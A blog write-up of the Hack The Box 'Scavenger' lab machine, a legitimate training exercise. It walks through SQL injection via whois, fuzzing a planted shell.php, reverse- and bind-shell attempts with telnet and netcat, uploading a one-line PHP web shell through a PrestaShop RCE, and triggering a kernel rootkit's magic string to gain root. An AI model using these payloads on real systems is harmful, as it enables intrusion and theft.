Hack The Box - Scavenger Writeup

System information



Initial scan

Nmap shows some services active and listening


Checking each daemon manually I can see that:

  • FTP is  vsFTPd 3.0.3
  • SMTP is ib01.supersechosting.htb ESMTP Exim 4.89
  • HTTP is an Apache 2.4.25 on Debian. The standard page shows a vhost config error: 

  • WHOIS is backed by a MariaDB database:


Opening the web page www.supersechosting.htb (one of the virtualhosts) I see this:


Nothing special on this page...

Initial foothold

As far as I know (maybe I'm dumb) there are no known vulnerabilities in the services, so my focus is on the whois with a MariaDB, which might be vulnerable to SQL injection.
After some tries, the first successful SQL command I can run is  a classic "UNION SELECT"

# whois  -h 10.10.10.155 "') UNION SELECT table_schema, table_name, 1 FROM information_schema.tables; "

% SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37
% for more information on SUPERSECHOSTING, visit http://www.supersechosting.htb

1222 (21000): The used SELECT statements have a different number of columns

The server basically replies that I can run SQL statement but the syntax is not OK (number of columns is not correct.

# whois  -h 10.10.10.155 "') UNION SELECT  table_name,1 FROM information_schema.tables  -- ' "

The reply is:
ALL_PLUGINSAPPLICABLE_ROLESCHARACTER_SETSCOLLATIONSCOLLATION_CHARACTER_SET_APPLICABILITYCOLUMNSCOLUMN_PRIVILEGESENABLED_ROLESENGINESEVENTSFILESGLOBAL_STATUSGLOBAL_VARIABLESKEY_CACHESKEY_COLUMN_USAGEPARAMETERSPARTITIONSPLUGINSPROCESSLISTPROFILINGREFERENTIAL_CONSTRAINTSROUTINESSCHEMATASCHEMA_PRIVILEGESSESSION_STATUSSESSION_VARIABLESSTATISTICSSYSTEM_VARIABLESTABLESTABLESPACESTABLE_CONSTRAINTSTABLE_PRIVILEGESTRIGGERSUSER_PRIVILEGESVIEWSGEOMETRY_COLUMNSSPATIAL_REF_SYSCLIENT_STATISTICSINDEX_STATISTICSINNODB_SYS_DATAFILESTABLE_STATISTICSINNODB_SYS_TABLESTATSUSER_STATISTICSINNODB_SYS_INDEXESXTRADB_RSEGINNODB_CMP_PER_INDEXINNODB_TRXCHANGED_PAGE_BITMAPSINNODB_FT_BEING_DELETEDINNODB_LOCK_WAITSINNODB_LOCKSINNODB_TABLESPACES_ENCRYPTIONXTRADB_INTERNAL_HASH_TABLESINNODB_SYS_FIELDSINNODB_CMPMEM_RESETINNODB_CMPINNODB_FT_INDEX_TABLEINNODB_SYS_TABLESPACESINNODB_MUTEXESINNODB_BUFFER_PAGE_LRUINNODB_SYS_FOREIGN_COLSINNODB_CMP_RESETINNODB_BUFFER_POOL_STATSINNODB_FT_INDEX_CACHEINNODB_SYS_FOREIGNINNODB_METRICSINNODB_FT_DEFAULT_STOPWORDINNODB_CMPMEMINNODB_SYS_TABLESINNODB_SYS_COLUMNSINNODB_FT_CONFIGINNODB_BUFFER_PAGEINNODB_CMP_PER_INDEX_RESETXTRADB_READ_VIEWINNODB_SYS_SEMAPHORE_WAITSINNODB_CHANGED_PAGESINNODB_FT_DELETEDINNODB_TABLESPACES_SCRUBBINGcustomers

This means that there is a table named customers s
Then the next is to find the name of the columns of the table:
# whois  -h 10.10.10.155 "') UNION SELECT  column_name,1 FROM information_schema.columns where table_name='customers' -- ' "

% SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37
% for more information on SUPERSECHOSTING, visit http://www.supersechosting.htb
% This query returned 3 object

Iddomaindata

This means that the columns are id, domain and data.
That reveals the following domains:

  • Supersechosting.htb
  • Justanotherblog.htb
  • Pwnhats.htb
  • Rentahacker.htb

After adding the domain mapping to my DNS I can open the websites in a web browser to find that:
  • www. Supersechosting.htb looks like a plain html website
  • www.justanotherblog.htb has only a “under construction” log
  • www.Pwnhats.htb is an e-commerce site running PrestaShop on top of PHP, MySQL, PHPmyadmin
  • www.rentahacker.htb is a blog on wordpress 5.0


I tried to find some vulnerability or CVE but with no luck.
I then tried to run dirbuster on them with no valuable results.

So I turned to DNS service to find additional information, performing a zone transfer (AXFR):

The website http://sec03.rentahacker.htb shows a page with an image and leet speech that the site was owned.

Running dirbuster I can find a login page of Mantis Bug tracker:
But it seems not valuable or usable to trigger. 
Dirbuster also shows other pages:
  • wiki.php
  • shell.php

The last one seems very very interesting and its output is blank: maybe it accepts some parameters, but which one?
Wfuzz can help to find them.
The syntax is wfuzz -w wordfile http://URL/FUZZ=sometext: wfuzz will substitute FUZZ with words form the wordfile.

IN this case: 
It picks words from the file common.txt file and gets URLs like this:
  • http://sec03.rentahacker.htb/shell.php?admin=ls
  • http://sec03.rentahacker.htb/shell.php?cmd=ls
  • http://sec03.rentahacker.htb/shell.php?ftp=ls

The output is this one:

Where the 200 is the HTTP response code and the 0 in the columns means a reply with 0 lines, 0 word and 0 chars of output.

I let it run until I see a non zero output:

Corresponding to the parameter hidden

The next step is to use this parameter opening the URL http://sec03.rentahacker.htb/shell.php?hidden=ls 
Now I found a way to execute commands, it's time to try some commands.

First of all a ping back to my computer... and it works!

Next a reverse connection to my computer (telnet 10.10.16.65 6666), but it doesn't work.


Next a bind shell with nc -lvp 6666 -e /bin/sh but it's not working either.

User Escalation (more than one)


So I believe it's time to look into the filesystems. First look is in /home and there are some folders:
  • ib01c01
  • ib01c02
  • ib01c03
  • ib01ftp
  • ib01wwwsupport
Looks like it will a long journey if I have to escalate more than one user...
The first look is in /home/ib01c03/www/ where I can find a wp-config.php but the output is not helpful


I can encode it with base64 and copy/paste the content to my machine and decode it


Looks like there is an account
  • Username:   ib01c03
  • Password:    Thi$sh1tIsN0tGut
Unfortunately it's not valid for SSH but it works with FTP
Connecting to it, I can look into his home, but no valuable content....
Tough there is something in /var/mail (which contains the user mail):
So now I  have an additional ftp account:

  • User ib01ftp
  • Pass: YghRt56_Ta
Connecting to FTP as user ib01ftp I can find two folders


In the first one there is a note.txt file, a pcap and a log file


The note.txt file gives an hint to look into the pcap file

OPening the pcap file with wireshark I can filter the HTTP streams and the 20th tcp stream 

So I believe we can find some juicy content in the pcap file

Looking into TCP streams I can find the  “tcp.stream eq 20” a POST to an admin dashboard with username and password



URL: http://www.pwnhats.htb/admin530o6uisg/
Username: pwnhats@pwnhats.htb
Password:    GetYouAH4t!

OPening it with web browser I can see that it is the admin dashboard of Prestashop E-commerce

In another tcp flow I see that there is a specific POST call that use a Proxy settings in the IMAP section that is prone to RCE. 


The part in the red circle can be decoded as a reverse shell netcat:


This is confirmed on the scavenger machine 



The next step is to use Burp to replicate this POST request to execute commands like a ping back to my computer:


I can try to execute commands like netcat but I think the connection are blocked, so I choose to upload a shell2.php file with a command like this one:
echo "<?php echo \"<pre>AAAA\"; \$cmd=(\$_REQUEST['cmd']); system(\$cmd);  ?>"  > shell2.php 

I encode it as base64 and put int BURP  and use it:



I'm able to execute commands as user ib01c01 (please ignore the "AAAA" strings I added during debugging.

Next I can execute ls in the home folder and show the user.txt file which contains the user flag

The file access.txt contains credentials for user ib01c01 valid for FTP but not for SSH:
Connecting to FTP I can see the content of the home:

But the .ssh folder is not writable, so no way to put a SSH public key to get shell access...
Also the other folder doesn't contain anything valuable.

Just for curiosity I can get to the startup iptables rules in /etc and see why the reverse shell is not working (basically only traffic on the ports of the listening services can flow in INPUT and OUTPUT:


Root Escalation

For this escalation I need to go back to the PCAP file.
Looking to TCP streams from the end of the file, I can see that there are some encrypted communication on port 4444 and 4445.
Just before this stream there is an HTTP (port 80) that can be filter with "tcp.stream eq 20". It downloads a file root.c:

Looking at it and searching the Internet, it seems that this is a rootkit for Linux.
Basically, it is a LKM that create a char device named /dev/ttyR0.
When a standard user send a special string to this device, its shell gets elevated privileges.

 In the original code the magic string is g0tR0ot

 So a command like 
echo "g0tR0ot" > /dev/ttyR0; id
will run id command as root

In the case of Scavenger I run the command lsmod

It seems that the machine has the LKM loaded.
But the command above is not elevating priveleges...

I believe that the LKM was compiled with a different magic string.
The compiled module (.ko file) can be found in “/home/ib01c01/…/” (note the space in front of the fiolder name) and can be downloaded with FTP.

With objdump tool I can disassmble and look into the code.
In a section of the code I can find the instructions that defines the magic value (the two movl below)


The magic word is defined by the hex string 67 33 74 50 72 31 76 which decoded to ASCII is g3tPr1v



So now using this string, I can execute id as root:

So it's only a matter of viewing the /root filder and discloses the content of some files

Credits.txt contains information on the LKM


root.txt contains the root flag




By -
Labels:

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.

Subscribe to: Post Comments (Atom)